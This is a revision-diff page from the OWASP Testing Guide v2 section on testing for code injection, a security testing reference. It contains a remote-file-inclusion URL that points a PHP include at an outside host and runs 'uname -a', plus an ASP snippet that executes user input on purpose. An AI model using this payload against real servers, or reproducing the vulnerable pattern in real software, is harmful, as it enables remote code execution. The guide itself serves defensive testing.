Difference between revisions of "Testing for Code Injection (OWASP-DV-012)"

From OWASP
Jump to: navigation, search
m (References)
m
Line 8: Line 8:
 
== Description of the Issue ==
 
== Description of the Issue ==
 
   
 
   
Code Injection testing involve a tester submitting code as input that is processed by the web server as dynamic code or as in an included file.  These tests can target various server side scripting engines, i.e. ASP, PHP, etc.  Proper validation and secure coding practices need to be employed to protect against these attacks.
+
Code Injection testing involves a tester submitting code as input that is processed by the web server as dynamic code or as an included file.  These tests can target various server-side scripting engines, i.e. ASP, PHP, etc.  Proper validation and secure coding practices need to be employed to protect against these attacks.
  
 
== Black Box testing and example ==
 
== Black Box testing and example ==
Line 21: Line 21:
 
'''Result Expected:'''
 
'''Result Expected:'''
  
The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an include file.
+
The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.
  
 
== Gray Box testing and example ==
 
== Gray Box testing and example ==

Revision as of 15:03, 29 December 2006

[Up]
OWASP Testing Guide v2 Table of Contents

Contents


Brief Summary

This section describes how a tester can check if it is possible to enter code as input on a web page and have it executed by the web server. More information about Code Injection here: http://www.owasp.org/index.php/Code_Injection

Description of the Issue

Code Injection testing involves a tester submitting code as input that is processed by the web server as dynamic code or as an included file. These tests can target various server-side scripting engines, i.e. ASP, PHP, etc. Proper validation and secure coding practices need to be employed to protect against these attacks.

Black Box testing and example

Testing for PHP Injection vulnerabilities:

Using the querystring, the tester can inject code (in this example, a malicious url) to be processed as part of the included file:

http://www.example.com/uptime.php?pin=http://www.example2.com/packx1/cs.jpg?&cmd=uname%20-a


Result Expected:

The malicious URL is accepted as a parameter for the PHP page, which will later use the value in an included file.

Gray Box testing and example

Testing for ASP Code Injection vulnerabilities

Examining ASP code for user input used in execution functions, e.g. Can the user enter commands into the Data input field? Here, the ASP code will save it to file and then execute it:

<%
If not isEmpty(Request( "Data" ) ) Then
Dim fso, f
'User input Data is written to a file named data.txt
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
f.Write Request("Data") & vbCrLf
f.close
Set f = nothing
Set fso = Nothing
'Data.txt is executed
Server.Execute( "data.txt" )
Else
%>
<form>
<input name="Data" /><input type="submit" name="Enter Data" />
</form>
<%
End If
%>)))


References



OWASP Testing Guide v2

Here is the OWASP Testing Guide v2 Table of Contents